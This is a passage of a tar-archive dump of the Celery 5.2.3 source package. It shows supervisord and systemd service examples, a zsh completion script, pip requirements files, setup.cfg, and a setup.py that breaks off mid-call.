celery-5.2.3/extra/supervisord/0000775000175000017500000000000000000000000016405 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/supervisord/celery.sh0000664000175000017500000000020600000000000020222 0ustar00asifasif00000000000000#!/bin/bash source {{ additional variables }} exec celery --app={{ application_name }}.celery:app worker --loglevel=INFO -n worker.%%h././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/supervisord/celerybeat.conf0000664000175000017500000000127300000000000021376 0ustar00asifasif00000000000000; ================================ ; celery beat supervisor example ; ================================ [program:celerybeat] ; Set full path to celery program if using virtualenv command=celery -A myapp beat --schedule /var/lib/celery/beat.db --loglevel=INFO ; remove the -A myapp argument if you aren't using an app instance directory=/path/to/project user=nobody numprocs=1 stdout_logfile=/var/log/celery/beat.log stderr_logfile=/var/log/celery/beat.log autostart=true autorestart=true startsecs=10 ; Causes supervisor to send the termination signal (SIGTERM) to the whole process group. 
stopasgroup=true

; if rabbitmq is supervised, set its priority higher
; so it starts first
priority=999

celery-5.2.3/extra/supervisord/celeryd.conf

; ==================================
;  celery worker supervisor example
; ==================================

[program:celery]
; Directory should come before command
directory=/path/to/project

user=nobody
numprocs=1
stdout_logfile=/var/log/celery/worker.log
stderr_logfile=/var/log/celery/worker.log
autostart=true
autorestart=true
startsecs=10

; Set full path to celery program if using virtualenv
command=celery -A proj worker --loglevel=INFO
; Alternatively,
;command=celery --app=your_app.celery:app worker --loglevel=INFO -n worker.%%h
; Or run a script
;command=celery.sh

; Need to wait for currently executing tasks to finish at shutdown.
; Increase this if you have very long running tasks.
stopwaitsecs = 600

; Causes supervisor to send the termination signal (SIGTERM) to the whole process group.
stopasgroup=true

; Set Celery priority higher than default (999)
; so, if rabbitmq is supervised, it will start first.
priority=1000

celery-5.2.3/extra/supervisord/supervisord.conf

[unix_http_server]
file=/tmp/supervisor.sock                     ; path to your socket file

[supervisord]
logfile=/var/log/supervisord/supervisord.log  ; supervisord log file
logfile_maxbytes=50MB                         ; maximum size of logfile before rotation
logfile_backups=10                            ; number of backed up logfiles
loglevel=info                                 ; info, debug, warn, trace
pidfile=/var/run/supervisord.pid              ; pidfile location
nodaemon=false                                ; run supervisord as a daemon
minfds=1024                                   ; number of startup file descriptors
minprocs=200                                  ; number of process descriptors
user=root                                     ; default user
childlogdir=/var/log/supervisord/             ; where child log files will live

[rpcinterface:supervisor]
supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface

[supervisorctl]
serverurl=unix:///tmp/supervisor.sock         ; use the unix:// scheme for unix sockets
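; A minimal sketch (file locations assumed, not taken from this repo): the
; [include] section below is what pulls the per-program configs
; (celeryd.conf / celerybeat.conf) into supervisord, e.g. when they are
; dropped next to this file:
;
;   [include]
;   files = celeryd.conf celerybeat.conf
;
; After editing any of these files, supervisord picks up the changes with:
;   $ supervisorctl reread
;   $ supervisorctl update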
[include] # Uncomment this line for celeryd for Python ;files=celeryd.conf ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7357554 celery-5.2.3/extra/systemd/0000775000175000017500000000000000000000000015510 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/systemd/celery.conf0000664000175000017500000000077700000000000017655 0ustar00asifasif00000000000000# See # http://docs.celeryproject.org/en/latest/userguide/daemonizing.html#usage-systemd CELERY_APP="proj" CELERYD_NODES="worker" CELERYD_OPTS="" CELERY_BIN="/usr/bin/celery" CELERYD_PID_FILE="/var/run/celery/%n.pid" CELERYD_LOG_FILE="/var/log/celery/%n%I.log" CELERYD_LOG_LEVEL="INFO" # The below lines should be uncommented if using the celerybeat.service example # unit file, but are unnecessary otherwise # CELERYBEAT_PID_FILE="/var/run/celery/beat.pid" # CELERYBEAT_LOG_FILE="/var/log/celery/beat.log" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/systemd/celery.service0000664000175000017500000000134400000000000020357 0ustar00asifasif00000000000000[Unit] Description=Celery Service After=network.target [Service] Type=forking User=celery Group=celery EnvironmentFile=-/etc/conf.d/celery WorkingDirectory=/opt/celery ExecStart=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi start $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS' ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE}' ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS' Restart=always [Install] WantedBy=multi-user.target ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/systemd/celery.tmpfiles0000664000175000017500000000011600000000000020536 0ustar00asifasif00000000000000d /var/run/celery 0755 celery celery - d /var/log/celery 0755 celery celery - ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/systemd/celerybeat.service0000664000175000017500000000061300000000000021211 0ustar00asifasif00000000000000[Unit] Description=Celery Beat Service After=network.target [Service] Type=simple User=celery Group=celery EnvironmentFile=/etc/conf.d/celery WorkingDirectory=/opt/celery ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \ --pidfile=${CELERYBEAT_PID_FILE} \ --logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}' Restart=always [Install] WantedBy=multi-user.target ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7357554 celery-5.2.3/extra/zsh-completion/0000775000175000017500000000000000000000000016773 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/zsh-completion/celery.zsh0000664000175000017500000001414400000000000021010 0ustar00asifasif00000000000000# This is a zsh completion script for Celery # It has to be installed as follows: # # Alternative A) Copy the script to your zsh site-functions directory (often # 
``/usr/share/zsh/site-functions``) and name the script ``_celery`` # # Alternative B). Or, use this file as a oh-my-zsh plugin (rename the script # to ``_celery``), and add it to .zshrc: plugins=(celery git osx ruby) # _celery () { local -a _1st_arguments ifargs dopts controlargs typeset -A opt_args _1st_arguments=('worker' 'events' 'beat' 'shell' 'multi' 'amqp' 'status' 'inspect' \ 'control' 'purge' 'list' 'migrate' 'call' 'result' 'report' \ 'graph', 'logtool', 'help') ifargs=('--app=' '--broker=' '--loader=' '--config=' '--version') dopts=('--detach' '--umask=' '--gid=' '--uid=' '--pidfile=' '--logfile=' '--loglevel=') controlargs=('--timeout' '--destination') _arguments \ '(-A --app=)'{-A,--app}'[app instance to use (e.g., module.attr_name):APP]' \ '(-b --broker=)'{-b,--broker}'[url to broker. default is "amqp://guest@localhost//":BROKER]' \ '(--loader)--loader[name of custom loader class to use.:LOADER]' \ '(--config)--config[Name of the configuration module:CONFIG]' \ '(--workdir)--workdir[Optional directory to change to after detaching.:WORKING_DIRECTORY]' \ '(-q --quiet)'{-q,--quiet}'[Don"t show as much output.]' \ '(-C --no-color)'{-C,--no-color}'[Don"t display colors.]' \ '(--version)--version[show program"s version number and exit]' \ '(- : *)'{-h,--help}'[show this help message and exit]' \ '*:: :->subcmds' && return 0 if (( CURRENT == 1 )); then _describe -t commands "celery sub-command" _1st_arguments return fi case "$words[1]" in worker) _arguments \ '(-C --concurrency=)'{-C,--concurrency=}'[Number of child processes processing the queue. The default is the number of CPUs.]' \ '(--pool)--pool=:::(prefork eventlet gevent solo)' \ '(--purge --discard)'{--discard,--purge}'[Purges all waiting tasks before the daemon is started.]' \ '(-f --logfile=)'{-f,--logfile=}'[Path to log file. If no logfile is specified, stderr is used.]' \ '(--loglevel=)--loglevel=:::(critical error warning info debug)' \ '(-N --hostname=)'{-N,--hostname=}'[Set custom hostname, e.g., "foo@example.com".]' \ '(-B --beat)'{-B,--beat}'[Also run the celerybeat periodic task scheduler.]' \ '(-s --schedule=)'{-s,--schedule=}'[Path to the schedule database if running with the -B option. Defaults to celerybeat-schedule.]' \ '(-S --statedb=)'{-S,--statedb=}'[Path to the state database.Default: None]' \ '(-E --events)'{-E,--events}'[Send events that can be captured by monitors like celeryev, celerymon, and others.]' \ '(--time-limit=)--time-limit=[nables a hard time limit (in seconds int/float) for tasks]' \ '(--soft-time-limit=)--soft-time-limit=[Enables a soft time limit (in seconds int/float) for tasks]' \ '(--max-tasks-per-child=)--max-tasks-per-child=[Maximum number of tasks a pool worker can execute before it"s terminated and replaced by a new worker.]' \ '(-Q --queues=)'{-Q,--queues=}'[List of queues to enable for this worker, separated by comma. 
By default all configured queues are enabled.]' \ '(-I --include=)'{-I,--include=}'[Comma separated list of additional modules to import.]' \ '(--pidfile=)--pidfile=[Optional file used to store the process pid.]' \ '(--autoscale=)--autoscale=[Enable autoscaling by providing max_concurrency, min_concurrency.]' \ compadd -a ifargs ;; inspect) _values -s \ 'active[dump active tasks (being processed)]' \ 'active_queues[dump queues being consumed from]' \ 'ping[ping worker(s)]' \ 'registered[dump of registered tasks]' \ 'report[get bugreport info]' \ 'reserved[dump reserved tasks (waiting to be processed)]' \ 'revoked[dump of revoked task ids]' \ 'scheduled[dump scheduled tasks (eta/countdown/retry)]' \ 'stats[dump worker statistics]' compadd -a controlargs ifargs ;; control) _values -s \ 'add_consumer[tell worker(s) to start consuming a queue]' \ 'autoscale[change autoscale settings]' \ 'cancel_consumer[tell worker(s) to stop consuming a queue]' \ 'disable_events[tell worker(s) to disable events]' \ 'enable_events[tell worker(s) to enable events]' \ 'pool_grow[start more pool processes]' \ 'pool_shrink[use less pool processes]' \ 'rate_limit[tell worker(s) to modify the rate limit for a task type]' \ 'time_limit[tell worker(s) to modify the time limit for a task type.]' compadd -a controlargs ifargs ;; multi) _values -s \ '--nosplash[Don"t display program info.]' \ '--verbose[Show more output.]' \ '--no-color[Don"t display colors.]' \ '--quiet[Don"t show as much output.]' \ 'start' 'restart' 'stopwait' 'stop' 'show' \ 'names' 'expand' 'get' 'kill' compadd -a ifargs ;; amqp) _values -s \ 'queue.declare' 'queue.purge' 'exchange.delete' 'basic.publish' \ 'exchange.declare' 'queue.delete' 'queue.bind' 'basic.get' ;; list) _values -s, 'bindings' ;; shell) _values -s \ '--ipython[force iPython.]' \ '--bpython[force bpython.]' \ '--python[force default Python shell.]' \ '--without-tasks[don"t add tasks to locals.]' \ '--eventlet[use eventlet.]' \ '--gevent[use gevent.]' compadd -a ifargs ;; beat) _arguments \ '(-s --schedule=)'{-s,--schedule=}'[Path to the schedule database. Defaults to celerybeat-schedule.]' \ '(-S --scheduler=)'{-S,--scheduler=}'[Scheduler class to use. Default is celery.beat.PersistentScheduler.]' \ '(--max-interval)--max-interval[]' compadd -a dopts fargs ;; events) _arguments \ '(-d --dump)'{-d,--dump}'[Dump events to stdout.]' \ '(-c --camera=)'{-c,--camera=}'[Take snapshots of events using this camera.]' \ '(-F --frequency=)'{-F,--frequency=}'[Camera: Shutter frequency. 
Default is every 1.0 seconds.]' \
      '(-r --maxrate=)'{-r,--maxrate=}'[Camera: Optional shutter rate limit (e.g., 10/m).]'
      compadd -a dopts fargs
      ;;
    *)
      ;;
  esac
}

celery-5.2.3/pyproject.toml

[tool.pytest.ini_options]
addopts = "--strict-markers"
testpaths = "t/unit/"
python_classes = "test_*"
xfail_strict = true
markers = ["sleepdeprived_patched_module", "masked_modules", "patched_environ", "patched_module"]

celery-5.2.3/requirements/README.rst

========================
 pip requirements files
========================

Index
=====

* :file:`requirements/default.txt`

    Default requirements for Python 3.7+.

* :file:`requirements/jython.txt`

    Extra requirements needed to run on Jython 2.5.

* :file:`requirements/security.txt`

    Extra requirements needed to use the message signing serializer;
    see the Security Guide.

* :file:`requirements/test.txt`

    Requirements needed to run the full unittest suite.

* :file:`requirements/test-ci-base.txt`

    Extra test requirements required by the CI suite (Tox).

* :file:`requirements/test-ci-default.txt`

    Extra test requirements required by the default CI suite (Tox).

* :file:`requirements/test-integration.txt`

    Extra requirements needed when running the integration test suite.

* :file:`requirements/doc.txt`

    Extra requirements required to build the Sphinx documentation.

* :file:`requirements/pkgutils.txt`

    Extra requirements required to perform package distribution maintenance.

* :file:`requirements/dev.txt`

    Requirement file installing the current dev branch of Celery and
    dependencies (will not be present in stable branches).
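The files under :file:`requirements/extras/` back the setuptools extras
declared in :file:`setup.py`, so pip's bundle syntax pulls in the matching
pin set (extra names below are assumed from the file names)::

    $ pip install "celery[redis,msgpack]"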
Examples ======== Installing requirements ----------------------- :: $ pip install -U -r requirements/default.txt Running the tests ----------------- :: $ pip install -U -r requirements/default.txt $ pip install -U -r requirements/test.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755410.0 celery-5.2.3/requirements/default.txt0000664000175000017500000000026300000000000017606 0ustar00asifasif00000000000000pytz>=2021.3 billiard>=3.6.4.0,<4.0 kombu>=5.2.3,<6.0 vine>=5.0.0,<6.0 click>=8.0.3,<9.0 click-didyoumean>=0.0.3 click-repl>=0.2.0 click-plugins>=1.1.1 setuptools>=59.1.1,<59.7.0 ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7397556 celery-5.2.3/requirements/deps/0000775000175000017500000000000000000000000016353 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/deps/mock.txt0000664000175000017500000000001200000000000020036 0ustar00asifasif00000000000000mock>=1.3 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/dev.txt0000664000175000017500000000022100000000000016732 0ustar00asifasif00000000000000pytz>dev git+https://github.com/celery/py-amqp.git git+https://github.com/celery/kombu.git git+https://github.com/celery/billiard.git vine>=5.0.0././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/docs.txt0000664000175000017500000000026400000000000017113 0ustar00asifasif00000000000000sphinx_celery==2.0.0 Sphinx>=3.0.0 sphinx-testing==0.7.2 sphinx-click==2.5.0 -r extras/sqlalchemy.txt -r test.txt -r deps/mock.txt -r extras/auth.txt -r extras/sphinxautobuild.txt ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7477558 celery-5.2.3/requirements/extras/0000775000175000017500000000000000000000000016726 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/arangodb.txt0000664000175000017500000000001700000000000021242 0ustar00asifasif00000000000000pyArango>=1.3.2././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/auth.txt0000664000175000017500000000001500000000000020424 0ustar00asifasif00000000000000cryptography ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/extras/azureblockblob.txt0000664000175000017500000000003300000000000022463 0ustar00asifasif00000000000000azure-storage-blob==12.9.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/brotli.txt0000664000175000017500000000015700000000000020765 0ustar00asifasif00000000000000brotlipy>=0.7.0;platform_python_implementation=="PyPy" brotli>=1.0.0;platform_python_implementation=="CPython" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/cassandra.txt0000664000175000017500000000003000000000000021417 0ustar00asifasif00000000000000cassandra-driver<3.21.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 
mtime=1634048807.0 celery-5.2.3/requirements/extras/consul.txt0000664000175000017500000000001700000000000020770 0ustar00asifasif00000000000000python-consul2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/cosmosdbsql.txt0000664000175000017500000000002400000000000022014 0ustar00asifasif00000000000000pydocumentdb==2.3.2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/requirements/extras/couchbase.txt0000664000175000017500000000016700000000000021427 0ustar00asifasif00000000000000couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/couchdb.txt0000664000175000017500000000001200000000000021067 0ustar00asifasif00000000000000pycouchdb ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/django.txt0000664000175000017500000000001500000000000020725 0ustar00asifasif00000000000000Django>=1.11 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/dynamodb.txt0000664000175000017500000000001700000000000021262 0ustar00asifasif00000000000000boto3>=1.9.178 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/elasticsearch.txt0000664000175000017500000000001600000000000022276 0ustar00asifasif00000000000000elasticsearch ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/extras/eventlet.txt0000664000175000017500000000005000000000000021310 0ustar00asifasif00000000000000eventlet>=0.32.0; python_version<"3.10" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/extras/gevent.txt0000664000175000017500000000001600000000000020754 0ustar00asifasif00000000000000gevent>=1.5.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/librabbitmq.txt0000664000175000017500000000002300000000000021752 0ustar00asifasif00000000000000librabbitmq>=1.5.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/memcache.txt0000664000175000017500000000004600000000000021231 0ustar00asifasif00000000000000pylibmc; platform_system != "Windows" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/requirements/extras/mongodb.txt0000664000175000017500000000002500000000000021111 0ustar00asifasif00000000000000pymongo[srv]>=3.11.1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/msgpack.txt0000664000175000017500000000001000000000000021103 0ustar00asifasif00000000000000msgpack ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/pymemcache.txt0000664000175000017500000000002100000000000021573 0ustar00asifasif00000000000000python-memcached 
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/pyro.txt0000664000175000017500000000000600000000000020454 0ustar00asifasif00000000000000pyro4 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/pytest.txt0000664000175000017500000000001600000000000021014 0ustar00asifasif00000000000000pytest-celery ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/requirements/extras/redis.txt0000664000175000017500000000003500000000000020573 0ustar00asifasif00000000000000redis>=3.4.1,!=4.0.0,!=4.0.1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/s3.txt0000664000175000017500000000001700000000000020012 0ustar00asifasif00000000000000boto3>=1.9.125 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/slmq.txt0000664000175000017500000000003300000000000020437 0ustar00asifasif00000000000000softlayer_messaging>=1.0.3 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/solar.txt0000664000175000017500000000005600000000000020610 0ustar00asifasif00000000000000ephem; platform_python_implementation!="PyPy" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/sphinxautobuild.txt0000664000175000017500000000003300000000000022705 0ustar00asifasif00000000000000sphinx-autobuild>=2021.3.14././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/sqlalchemy.txt0000664000175000017500000000001300000000000021623 0ustar00asifasif00000000000000sqlalchemy ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1636628346.0 celery-5.2.3/requirements/extras/sqs.txt0000664000175000017500000000001300000000000020267 0ustar00asifasif00000000000000kombu[sqs] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/tblib.txt0000664000175000017500000000011100000000000020554 0ustar00asifasif00000000000000tblib>=1.5.0;python_version>='3.8.0' tblib>=1.3.0;python_version<'3.8.0' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/thread.txt0000664000175000017500000000004700000000000020737 0ustar00asifasif00000000000000futures>=3.1.1; python_version < '3.0' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/yaml.txt0000664000175000017500000000001500000000000020425 0ustar00asifasif00000000000000PyYAML>=3.10 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/zeromq.txt0000664000175000017500000000001600000000000021001 0ustar00asifasif00000000000000pyzmq>=13.1.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/zookeeper.txt0000664000175000017500000000001500000000000021466 
0ustar00asifasif00000000000000kazoo>=1.3.1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/zstd.txt0000664000175000017500000000001200000000000020444 0ustar00asifasif00000000000000zstandard ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/pkgutils.txt0000664000175000017500000000034200000000000020022 0ustar00asifasif00000000000000setuptools>=40.8.0 wheel>=0.33.1 flake8>=3.8.3 flakeplus>=1.1 flake8-docstrings~=1.5 pydocstyle~=5.0; python_version >= '3.0' tox>=3.8.4 sphinx2rst>=1.0 # Disable cyanide until it's fully updated. # cyanide>=1.0.1 bumpversion ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/security.txt0000664000175000017500000000002300000000000020023 0ustar00asifasif00000000000000-r extras/auth.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/test-ci-base.txt0000664000175000017500000000020100000000000020432 0ustar00asifasif00000000000000pytest-cov codecov -r extras/redis.txt -r extras/sqlalchemy.txt -r extras/pymemcache.txt -r extras/thread.txt -r extras/auth.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1636628346.0 celery-5.2.3/requirements/test-ci-default.txt0000664000175000017500000000104500000000000021153 0ustar00asifasif00000000000000-r test-ci-base.txt -r extras/auth.txt -r extras/solar.txt -r extras/mongodb.txt -r extras/yaml.txt -r extras/tblib.txt -r extras/slmq.txt -r extras/msgpack.txt -r extras/memcache.txt -r extras/eventlet.txt -r extras/gevent.txt -r extras/thread.txt -r extras/elasticsearch.txt -r extras/couchdb.txt -r extras/couchbase.txt -r extras/arangodb.txt -r extras/consul.txt -r extras/cosmosdbsql.txt -r extras/cassandra.txt -r extras/azureblockblob.txt # SQS dependencies other than boto pycurl==7.43.0.5 # Latest version with wheel built (for appveyor) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/test-integration.txt0000664000175000017500000000016500000000000021463 0ustar00asifasif00000000000000-r extras/redis.txt -r extras/azureblockblob.txt -r extras/auth.txt -r extras/memcache.txt pytest-rerunfailures>=6.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/test-pypy3.txt0000664000175000017500000000002100000000000020213 0ustar00asifasif00000000000000-r deps/mock.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/test.txt0000664000175000017500000000021700000000000017140 0ustar00asifasif00000000000000pytest~=6.2 pytest-celery pytest-subtests pytest-timeout~=1.4.2 boto3>=1.9.178 moto>=2.2.6 pre-commit -r extras/yaml.txt -r extras/msgpack.txt ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8677578 celery-5.2.3/setup.cfg0000664000175000017500000000155000000000000014517 0ustar00asifasif00000000000000[build_sphinx] source-dir = docs/ build-dir = docs/_build all_files = 1 [flake8] max-line-length = 117 extend-ignore = E203, # incompatible with black https://github.com/psf/black/issues/315#issuecomment-395457972 D102, # Missing docstring in public method 
D104, # Missing docstring in public package D105, # Missing docstring in magic method D107, # Missing docstring in __init__ D401, # First line should be in imperative mood; try rephrasing D412, # No blank lines allowed between a section header and its content E741, # ambiguous variable name '...' E742, # ambiguous class definition '...' per-file-ignores = t/*,setup.py,examples/*,docs/*,extra/*: D, [bdist_rpm] requires = pytz >= 2016.7 billiard >= 3.6.3.0,<4.0 kombu >= 5.2.1,<6.0.0 [bdist_wheel] universal = 0 [metadata] license_file = LICENSE [egg_info] tag_build = tag_date = 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/setup.py0000775000175000017500000001174300000000000014420 0ustar00asifasif00000000000000#!/usr/bin/env python3 import codecs import os import re import sys import setuptools import setuptools.command.test NAME = 'celery' # -*- Extras -*- EXTENSIONS = { 'arangodb', 'auth', 'azureblockblob', 'brotli', 'cassandra', 'consul', 'cosmosdbsql', 'couchbase', 'couchdb', 'django', 'dynamodb', 'elasticsearch', 'eventlet', 'gevent', 'librabbitmq', 'memcache', 'mongodb', 'msgpack', 'pymemcache', 'pyro', 'pytest', 'redis', 's3', 'slmq', 'solar', 'sqlalchemy', 'sqs', 'tblib', 'yaml', 'zookeeper', 'zstd' } # -*- Distribution Meta -*- re_meta = re.compile(r'__(\w+?)__\s*=\s*(.*)') re_doc = re.compile(r'^"""(.+?)"""') def _add_default(m): attr_name, attr_value = m.groups() return ((attr_name, attr_value.strip("\"'")),) def _add_doc(m): return (('doc', m.groups()[0]),) def parse_dist_meta(): """Extract metadata information from ``$dist/__init__.py``.""" pats = {re_meta: _add_default, re_doc: _add_doc} here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, NAME, '__init__.py')) as meta_fh: distmeta = {} for line in meta_fh: if line.strip() == '# -eof meta-': break for pattern, handler in pats.items(): m = pattern.match(line.strip()) if m: distmeta.update(handler(m)) return distmeta # -*- Requirements -*- def _strip_comments(l): return l.split('#', 1)[0].strip() def _pip_requirement(req): if req.startswith('-r '): _, path = req.split() return reqs(*path.split('/')) return [req] def _reqs(*f): return [ _pip_requirement(r) for r in ( _strip_comments(l) for l in open( os.path.join(os.getcwd(), 'requirements', *f)).readlines() ) if r] def reqs(*f): """Parse requirement file. Example: reqs('default.txt') # requirements/default.txt reqs('extras', 'redis.txt') # requirements/extras/redis.txt Returns: List[str]: list of requirements specified in the file. 
""" return [req for subreq in _reqs(*f) for req in subreq] def extras(*p): """Parse requirement in the requirements/extras/ directory.""" return reqs('extras', *p) def install_requires(): """Get list of requirements required for installation.""" return reqs('default.txt') def extras_require(): """Get map of all extra requirements.""" return {x: extras(x + '.txt') for x in EXTENSIONS} # -*- Long Description -*- def long_description(): try: return codecs.open('README.rst', 'r', 'utf-8').read() except OSError: return 'Long description error: Missing README.rst file' # -*- Command: setup.py test -*- class pytest(setuptools.command.test.test): user_options = [('pytest-args=', 'a', 'Arguments to pass to pytest')] def initialize_options(self): super().initialize_options() self.pytest_args = [] def run_tests(self): import pytest as _pytest sys.exit(_pytest.main(self.pytest_args)) # -*- %%% -*- meta = parse_dist_meta() setuptools.setup( name=NAME, packages=setuptools.find_packages(exclude=['t', 't.*']), version=meta['version'], description=meta['doc'], long_description=long_description(), keywords=meta['keywords'], author=meta['author'], author_email=meta['contact'], url=meta['homepage'], license='BSD', platforms=['any'], install_requires=install_requires(), python_requires=">=3.7,", tests_require=reqs('test.txt'), extras_require=extras_require(), cmdclass={'test': pytest}, include_package_data=True, zip_safe=False, entry_points={ 'console_scripts': [ 'celery = celery.__main__:main', ] }, project_urls={ "Documentation": "https://docs.celeryproject.org/en/latest/index.html", "Changelog": "https://docs.celeryproject.org/en/stable/changelog.html", "Code": "https://github.com/celery/celery", "Tracker": "https://github.com/celery/celery/issues", "Funding": "https://opencollective.com/celery" }, 